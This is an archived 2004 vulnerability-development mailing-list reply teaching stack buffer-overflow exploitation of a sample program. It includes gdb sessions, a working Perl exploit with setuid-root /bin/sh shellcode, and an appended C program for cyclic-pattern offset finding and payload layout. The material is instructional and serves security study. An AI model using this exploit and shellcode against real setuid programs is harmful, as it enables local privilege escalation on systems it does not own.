Vulnerability Development: RE: Buffer Overflow Help

RE: Buffer Overflow Help

From: Carlos Carvalho <h4sh_at_globo.com>
Date: Wed, 10 Nov 2004 14:55:08 -0300

Ok, let's go. I'm going to describe the method that I use to find addresses
and how to exploit them. I wrote the proper exploit for this vulnerable
program in Perl; I hope you understand (I don't code in C).

Let's see some gdb:

(gdb) r `perl -e 'print "A"x268'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/help/vuln `perl -e 'print "A"x268'`
You Entered:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x42015800 in init () from /lib/i686/libc.so.6
(gdb) x/x $eip
0x42015800 : 0x04bb8900
(gdb) r `perl -e 'print "A"x272'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/help/vuln `perl -e 'print "A"x272'`
You Entered:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/x $eip
0x41414141: Cannot access memory at address 0x41414141

You are right, with 272 bytes we can overwrite the return address (eip).

 Now look at the exploitation:

[hash_at_etmba12 /tmp/help]$ ./example.pl
Return address: 0xbfffffb5

You Entered:µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿µÿÿ¿
sh-2.05b$

 Now the exploit I wrote:
------------------------------
#!/usr/bin/perl
# env method local stack overflow
# by Carlos Carvalho - length
# <h4sh_at_globo.com length_at_flowsecurity.org>
use strict;
use warnings;

my $shellcode =
             # setuid0 by length: setreuid(0, 0) via int 0x80 (eax = 0x46)
             "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80".
             # shellcode: execve("/bin/sh") followed by exit
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
             "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
             "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
             "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";

# The vulnerable binary, run by this exact path: the path string sits at
# the very top of the stack, so its length enters the address estimate.
my $path = "/tmp/help/vuln";

# Env method: the shellcode goes into an environment variable, which the
# kernel copies just below the top of the stack (0xbffffffa on this 2.4
# i686 box), right after the program path. An optional argument nudges
# the guess up or down.
my $return_addr = 0xbffffffa - length($shellcode) - length($path);
my $offset = shift || 0;

# Return address as a little-endian 32-bit value (native order on x86).
my $nret = pack('l', $return_addr + $offset);

# 268 NOPs reach the saved return address (see the gdb runs above);
# the address is repeated so the first copy lands on it.
my $buffer = "\x90" x 268;
$buffer .= $nret x 6;

printf("Return address: 0x%lx\n", $return_addr + $offset);

# Export the shellcode into the environment of the child, then run it.
local $ENV{'FUCK'} = $shellcode;
exec("$path $buffer");
------------------------------

 I hope this example helps you. Now some information about the machine that I
used to write this:

$ rpm -qi gcc
Name : gcc
Version : 3.2

$ uname -a
Linux ***** 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386 GNU/Linux
# _____
# | ___| | _____ __
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
#
# Security group
length - www.flowsecurity.org
Received on Nov 10 2004
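The two gdb runs above pin the saved return address at byte 268: with 268 bytes the crash is still inside libc because only the string's terminating NUL reaches the saved eip and zeroes its low byte (0x42015800), while 272 bytes put 0x41414141 into eip outright. An all-"A" buffer cannot give that offset from a single crash, but a cyclic pattern can. The C program below is an added example, not code from the post or its author: it generates such a pattern, recovers the offset from the faulting eip value gdb would print, then lays out the overflow string the way the Perl exploit does (NOP sled up to the saved return address, then the address repeated) and recomputes the environment-method return address from the post's own 55-byte shellcode and 14-byte path, which reproduces the 0xbfffffb5 shown above. The function names and buffer sizes are my own; the stack-top constant 0xbffffffa is the post's and only holds for a 32-bit, non-randomized Linux 2.4 stack like the one described.

```c
/* Added example: cyclic-pattern offset finding plus the post's payload layout. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The post's shellcode (setreuid(0,0) + execve("/bin/sh")), kept only to
 * measure its length (55 bytes); it is never executed here. */
static const char SHELLCODE[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88"
    "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
    "\xff\xff/bin/sh";
static const char TARGET_PATH[] = "/tmp/help/vuln";   /* from the post */

/* Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
 * for the first 20280 bytes, so one crash dump gives the offset. */
static size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                const char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* Given the eip gdb reported after feeding a `len`-byte pattern, return the
 * byte offset at which that little-endian value sat, or -1 if not found
 * (an all-'A' crash such as 0x41414141 yields -1: it carries no position). */
static long pattern_offset(size_t len, uint32_t eip)
{
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff), (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    char *pat = malloc(len);
    if (!pat) return -1;
    size_t got = pattern_create(pat, len);
    long found = -1;
    for (size_t i = 0; i + 4 <= got; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

/* The post's layout: `ret_off` NOPs so the sled ends exactly at the saved
 * return address, then `copies` little-endian copies of `ret`.
 * Returns the payload length, or 0 if `cap` is too small. */
static size_t build_payload(unsigned char *out, size_t cap, size_t ret_off,
                            uint32_t ret, int copies)
{
    if (copies < 0 || ret_off + 4 * (size_t)copies > cap) return 0;
    memset(out, 0x90, ret_off);
    size_t n = ret_off;
    for (int i = 0; i < copies; i++) {
        out[n++] = (unsigned char)(ret & 0xff);
        out[n++] = (unsigned char)((ret >> 8) & 0xff);
        out[n++] = (unsigned char)((ret >> 16) & 0xff);
        out[n++] = (unsigned char)((ret >> 24) & 0xff);
    }
    return n;
}

/* The post's env-method estimate: top of stack (0xbffffffa on its 2.4 i686
 * box) minus the shellcode string minus the program path, plus a manual
 * adjustment.  Only meaningful on a 32-bit, non-randomized stack. */
static uint32_t env_ret_addr(size_t shellcode_len, size_t path_len, long adjust)
{
    return (uint32_t)(0xbffffffaUL - shellcode_len - path_len + (unsigned long)adjust);
}

/* The value the post's exploit printed: 0xbfffffb5. */
static uint32_t post_return_addr(void)
{
    return env_ret_addr(sizeof(SHELLCODE) - 1, sizeof(TARGET_PATH) - 1, 0);
}

int main(void)
{
    char pat[300];
    size_t n = pattern_create(pat, sizeof pat);
    printf("pattern (%zu bytes): %.36s...\n", n, pat);
    /* Constructed crash value: what gdb would show if eip held pat[268..271]. */
    printf("offset of eip 0x6a413969: %ld\n", pattern_offset(sizeof pat, 0x6a413969u));
    printf("offset of eip 0x41414141: %ld (all-'A' input says nothing)\n",
           pattern_offset(sizeof pat, 0x41414141u));
    unsigned char payload[512];
    uint32_t ret = post_return_addr();
    size_t plen = build_payload(payload, sizeof payload, 268, ret, 6);
    printf("Return address: 0x%lx, payload %zu bytes\n", (unsigned long)ret, plen);
    return 0;
}
```

In practice you run the target once under gdb with the pattern as its argument, read the eip from the SIGSEGV line, and feed it to pattern_offset; the result (268 here) is the NOP-sled length for build_payload, and the payload length of 292 bytes matches the Perl exploit's 268 NOPs plus six 4-byte addresses.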
